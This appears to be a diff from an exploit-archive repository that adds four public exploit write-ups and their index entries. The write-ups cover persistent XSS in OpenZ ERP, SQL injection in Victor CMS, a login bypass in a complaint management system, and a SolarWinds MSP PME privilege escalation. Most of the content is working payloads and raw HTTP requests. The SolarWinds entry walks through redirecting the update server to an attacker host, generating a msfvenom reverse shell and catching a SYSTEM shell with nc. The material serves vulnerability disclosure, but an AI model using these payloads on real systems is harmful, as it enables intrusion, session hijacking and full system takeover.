mod=media&opt=media&folder=&CKEditorFuncNum=&callback=&style=&faddm=&imgopts=&__signature_key=27966e9129793e80a70089ee1c3ebfd5-tester&__signature_dsi=0ad6659c2aa31871b0b44617cf0b1200&rm%5B%5D=../avatar.png&do_action=delete

192
exploits/php/webapps/48450.txt Normal file
View file

@ -0,0 +1,192 @@
# Exploit Title: OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting
# Date: 2020-05-11
# Exploit Author: Vulnerability-Lab
# Vendor: https://www.openz.de/
# https://www.openz.de/download.html
Document Title:
===============
OpenZ v3.6.60 ERP - Employee Persistent XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2234
Common Vulnerability Scoring System:
====================================
4.6
Product & Service Introduction:
===============================
https://www.openz.de/
https://www.openz.de/download.html
Affected Product(s):
====================
OpenZ
Product: OpenZ v3.6.60 - ERP (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2020-05-06: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
A persistent cross site scripting web vulnerability has been discovered
in the official OpenZ v3.6.60 ERP web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The persistent vulnerability is located in the `inpname` and
`inpdescripción` parameters of the `Employee` add/register/edit
module in the `menu.html` file. Remote attackers with low privileges are
able to inject own malicious persistent script code as
name or description. The injected code can be used to attack the
frontend or backend of the web-application. The request method
to inject is POST and the attack vector is located on the
application-side. The attack can be triggered from low privilege user
accounts against higher privilege user accounts like manager or
administrators to elevate privileges via session hijacking.
Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected
application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Employee
Vulnerable Input(s):
[+] Mitarbeiter Name
[+] Beschreibung
Vulnerable File(s):
[+] Menu.html
Vulnerable Parameter(s):
[+] inpname
[+] inpdescription
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by low privileged web
application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the openz web-application
2. Register, add or edit via profile settings the inpname &
inpdescription parameter inputs
3. Edit inpname & inpdescription parameter of the profile and save the entry
Note: The execute occurs on preview of the user credentials in the
/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html
4. Successful reproduce of the persistent web vulnerability!
--- POC Session Logs [POST] --- (Inject via Add / Edit)
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html
Host: localhost:8080
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 1464
Origin: https://localhost:8080
Connection: keep-alive
Referer:
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html
Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544;
_ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275
Command=SAVE_EDIT_RELATION&inpLastFieldChanged=inpdescription&inpkeyColumnIdInp=&inpParentKeyColumn=&inpDirectKey=&
inpKeyReferenceColumnName=&inpTableReferenceId=&inpKeyReferenceId=&autosave=N&inpnewdatasetindicator=&inpnewdataseIdVal=&
inpenabledautosave=Y&inpisemployee=Y&inpistaxexempt=N&inpadClientId=C726FEC915A54A0995C568555DA5BB3C&inpaAssetId=&
inpcGreetingId=&inpcBpartnerId=8BEB3E9FD5D24F9BBCF777A51D53F5AF&inpissummary=N&inprating=N&inpTableId=AC9B98C649CD4F55B37714008EE8519F&
inpkeyColumnId=C_BPartner_ID&inpKeyName=inpcBpartnerId&mappingName=/org.openbravo.zsoft.smartui.Employee/
EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html&inpwindowId=39D3CD9F77A942D690965D49106F011B&
inpTabId=A3D0B320B69845B386024B5FF6B1E266&inpCommandType=EDIT&updatedTimestamp=20200426170335&inpParentOrganization=&
inpadOrgId=1AF9E07685234E0A9FEC1D9B58A4876B&inpadImageId=&
inpvalue=325235&inpname=>"><iframe
src=evil.source><iframe></iframe></iframe>&
inpdescription=>"><iframe
src=evil.source><iframe></iframe></iframe>&inpimageurl=31337&
inpisactive=Y&inpisinresourceplan=Y&inpapprovalamt=0,00&inpcSalaryCategoryId=&inptaxid=&inpreferenceno=&
inpcBpGroupId=42691AE1D13F400AB814B70361E167C3&inpadLanguage=de_DE&inpcountry=Deutschland&inpzipcode=&
inpcity=&inpcreated=26-04-2020
17:03:35&inpcreatedby=Service&inpupdated=26-04-2020
17:03:35&inpupdatedby=Service
-
POST: HTTP/1.1 302 Found
Server: Apache/2.4.38 (Debian)
Location:
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html?Command=RELATION
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
- (Execution in Listing)
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/evil.source
Host: myerponline.de
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer:
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html
Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544;
_ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.38 (Debian)
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1110
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
PoC: Vulnerable Source (/security/Menu.html)
<table width="0px" height="0px" cellspacing="0" cellpadding="0">
<tbody><tr>
<td><input type="text" class="DataGrid_Table_Dummy_Input"
id="grid_table_dummy_input"></td>
</tr>
</tbody></table>
<input type="hidden" name="inpcBpartnerId"
value="8BEB3E9FD5D24F9BBCF777A51D53F5AF" id="keyParent">
<div class="RelationInfoContainer">
<table class="RelationInfo">
<tbody><tr>
<td class="RelationInfoTitle" id="related_info_cont">Business Partner:</td>
<td class="RelationInfoContent" id="paramParentC_BPartner_ID">325235 -
>"><iframe src="a"></TD>
</TR>
Reference(s):
https://localhost:8080/
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/Employee
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
--
VULNERABILITY LABORATORY - RESEARCH TEAM

52
exploits/php/webapps/48451.txt Normal file
View file

@ -0,0 +1,52 @@
# Exploit Title: Victor CMS 1.0 - 'post' SQL Injection
# Google Dork: N/A
# Date: 2020-05-09
# Exploit Author: BKpatron
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com
# Discription:
# The Victor CMS v1.0 application is vulnerable to SQL injection via the 'post' parameter on the post.php page.
# vulnerable file : post.php
http://localhost/CMSsite-master/post.php?post=1
Parameter: post (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: post=1 AND 2333=2333
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: post=1 AND (SELECT 4641 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(4641=4641,1))),0x717a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: post=1 AND (SELECT 7147 FROM (SELECT(SLEEP(5)))vltp)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: post=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL-- PTYU
[INFO] the back-end DBMS is MySQL
web application technology: PHP, Apache 2.4.39, PHP 7.2.18
back-end DBMS: MySQL >= 5.0
# Proof of Concept:
http://localhost/CMSsite-master/post.php?post=sqli
http://localhost/CMSsite-master/post.php?post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU
GET /CMSsite-master/post.php?post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=gd27m8o57gcb23t7se4d4tdv1g
Connection: keep-alive
Upgrade-Insecure-Requests: 1
post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU

29
exploits/php/webapps/48452.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: complaint management system 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-05-10
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/complaint-management-system.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : admin/index.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/Complaint%20Management%20System/admin/
POST /Complaint%20Management%20System/admin/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Referer: http://localhost/Complaint%20Management%20System/admin/
Cookie:PHPSESSID=6d1ef7ce1b4rgp44ep3iqncfn4
Connection: keep-alive
Upgrade-Insecure-Requests: 1
username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined

166
exploits/windows/local/48448.txt Normal file
View file

@ -0,0 +1,166 @@
# Title: SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions
# Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
# Date: 2020-05-06
# Vendor: https://www.solarwindsmsp.com/
# CVE: CVE-2020-1260
# GitHub: https://github.com/jensregel/Advisories/tree/master/CVE-2020-12608
# CVSSv3: 8.2 [CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H]
# CWE: 276
Vulnerable version
==================
SolarWinds MSP PME (Patch Management Engine) before 1.1.15
Timeline
========
2020-04-24 Vulnerability discovered
2020-04-27 Send details to SolarWinds PSIRT
2020-04-27 SolarWinds confirmed the vulnerability
2020-05-05 SolarWinds released PME version 1.1.15
2020-05-06 Public disclosure
Description
===========
An error with insecure file permissions has occurred in the SolarWinds
MSP Cache Service, which is part of the Advanced Monitoring Agent and
can lead to code execution. The SolarWinds MSP Cache Service is
typically used to get new update definition files and versions for
ThirdPartyPatch.exe or SolarWinds MSP Patch Management Engine Setup. The
XML file CacheService.xml in %PROGRAMDATA%\SolarWinds
MSP\SolarWinds.MSP.CacheService\config\ is writable by normal users, so
that the parameter SISServerURL can be changed, which controls the
location of the updates. After some analysis, we were able to provide
modified XML files (PMESetup_details.xml and
ThirdPartyPatch_details.xml) that point to an executable file with a
reverse TCP payload using our controlled SISServerURL web server for
SolarWinds MSP Cache Service.
Proof of Concept (PoC)
======================
As we can see, NTFS change permissions are set to CacheService.xml by
default. Any user on the system who is in group users can change the
file content. This is especially a big problem on terminal servers or
multi-user systems.
PS C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\config>
icacls .\CacheService.xml
.\CacheService.xml VORDEFINIERT\Benutzer:(I)(M)
NT-AUTORITÄT\SYSTEM:(I)(F)
VORDEFINIERT\Administratoren:(I)(F)
1. Modify CacheService.xml
In the xml file, the parameter SISServerURL was adjusted, which now
points to a web server controlled by the attacker.
<?xml version="1.0" encoding="utf-8"?>
<Configuration>
<CachingEnabled>True</CachingEnabled>
<ApplianceVersion>1.1.14.2223</ApplianceVersion>
<CacheLocation>C:\ProgramData\SolarWinds
MSP\SolarWinds.MSP.CacheService\cache</CacheLocation>
<CacheSizeInMB>10240</CacheSizeInMB>
<SISServerURL>https://evil-attacker.example.org</SISServerURL>
<LogLevel>5</LogLevel>
<Proxy></Proxy>
<ProxyEncrypt>AQAAANCMnd8BFdER(...)</ProxyEncrypt>
<ProxyCacheService />
<CacheFilesDeleted></CacheFilesDeleted>
<CacheDeletedInBytes></CacheDeletedInBytes>
<HostApplication>RMM</HostApplication>
<CanBypassProxyCacheService>True</CanBypassProxyCacheService>
<BypassProxyCacheServiceTimeoutSeconds>1</BypassProxyCacheServiceTimeoutSeconds>
<ComponentUpdateMinutes>300</ComponentUpdateMinutes>
<ComponentUpdateDelaySeconds>1</ComponentUpdateDelaySeconds>
</Configuration>
2. Payload creation
Generate an executable file, for example using msfvenom, that
establishes a reverse tcp connection to the attacker and store it on the
web server.
msfvenom -p windows/x64/shell_reverse_tcp lhost=x.x.x.x lport=4444 -f
exe > /tmp/solarwinds-shell.exe
3. Prepare web server
Place the modified xml files (PMESetup_details.xml or
ThirdPartyPatch_details.xml) on the web server in the path
/ComponentData/RMM/1/, calculate MD5, SHA1 and SHA256 checksums of the
executable, set correct values for SizeInBytes and increase the version.
Example of PMESetup_details.xml
<ComponentDetails>
<Name>Patch Management Engine</Name>
<Description>Patch Management Engine</Description>
<MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
<SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
<SHA256Checksum>
80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
</SHA256Checksum>
<SizeInBytes>7168</SizeInBytes>
<DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
<FileName>solarwinds-shell.exe</FileName>
<Architecture>x86,x64</Architecture>
<Locale>all</Locale>
<Version>1.1.14.2224</Version>
</ComponentDetails>
Example of ThirdPartyPatch_details.xml
<ComponentDetails xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Name>Third Party Patch</Name>
<Description>
Third Party Patch application for Patch Management Engine RMM v 1 and later
</Description>
<MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
<SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
<SHA256Checksum>
80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
</SHA256Checksum>
<SizeInBytes>7168</SizeInBytes>
<DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
<FileName>solarwinds-shell.exe</FileName>
<Architecture>x86,x64</Architecture>
<Locale>all</Locale>
<Version>1.2.1.95</Version>
</ComponentDetails>
4. Malicious executable download
After restarting the system or reloading the CacheService.xml, the
service connects to the web server controlled by the attacker and
downloads the executable file. This is then stored in the path
%PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\cache\ and
%PROGRAMDATA%\SolarWinds MSP\PME\archives\.
[24/Apr/2020:10:57:01 +0200] "HEAD
/ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 5307 "-" "-"
[24/Apr/2020:10:57:01 +0200] "GET
/ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 7585 "-" "-"
5. Getting shell
After a certain time the executable file is executed by SolarWinds MSP
RPC Server service and establishes a connection with the rights of the
system user to the attacker.
[~]: nc -nlvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [x.x.x.x] port 4444 [tcp/*] accepted (family 2, sport 49980)
Microsoft Windows [Version 10.0.18363.778]
(c) 2019 Microsoft Corporation. Alle Rechte vorbehalten.
C:\WINDOWS\system32>whoami
whoami
nt-authority\system
C:\WINDOWS\system32>
Fix
===
There is a new PME version 1.1.15 which comes with auto-update
https://success.solarwindsmsp.com/forum-post/X0D51T00007TMk6jSAD/

11
files_exploits.csv
View file

@ -11069,6 +11069,7 @@ id,file,description,date,author,type,platform,port
48414,exploits/windows/local/48414.txt,"Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path",2020-05-04,"Minh Tuan",local,windows,
48415,exploits/windows/local/48415.py,"Frigate 3.36 - Buffer Overflow (SEH)",2020-05-04,"Xenofon Vassilakopoulos",local,windows,
48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows,
48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42674,3 +42675,13 @@ id,file,description,date,author,type,platform,port
48438,exploits/php/webapps/48438.txt,"Online Clothing Store 1.0 - Arbitrary File Upload",2020-05-07,"Sushant Kamble",webapps,php,
48439,exploits/php/webapps/48439.txt,"Pisay Online E-Learning System 1.0 - Remote Code Execution",2020-05-07,boku,webapps,php,
48440,exploits/php/webapps/48440.txt,"Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection",2020-05-07,BKpatron,webapps,php,
48442,exploits/linux/webapps/48442.py,"Pi-hole < 4.4 - Authenticated Remote Code Execution",2020-05-10,"Nick Frichette",webapps,linux,
48443,exploits/linux/webapps/48443.py,"Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation",2020-05-10,"Nick Frichette",webapps,linux,
48444,exploits/php/webapps/48444.txt,"Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection",2020-05-11,"Tarun Sehgal",webapps,php,
48445,exploits/aspx/webapps/48445.txt,"Kartris 1.6 - Arbitrary File Upload",2020-05-11,"Nhat Ha",webapps,aspx,
48446,exploits/php/webapps/48446.txt,"Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting",2020-05-11,Vulnerability-Lab,webapps,php,
48447,exploits/php/webapps/48447.txt,"CuteNews 2.1.2 - Arbitrary File Deletion",2020-05-11,Besim,webapps,php,
48450,exploits/php/webapps/48450.txt,"OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting",2020-05-11,Vulnerability-Lab,webapps,php,
48451,exploits/php/webapps/48451.txt,"Victor CMS 1.0 - 'post' SQL Injection",2020-05-11,BKpatron,webapps,php,
48452,exploits/php/webapps/48452.txt,"Complaint Management System 1.0 - Authentication Bypass",2020-05-11,BKpatron,webapps,php,
48453,exploits/multiple/webapps/48453.txt,"LibreNMS 1.46 - 'search' SQL Injection",2020-05-11,Punt,webapps,multiple,

Can't render this file because it is too large.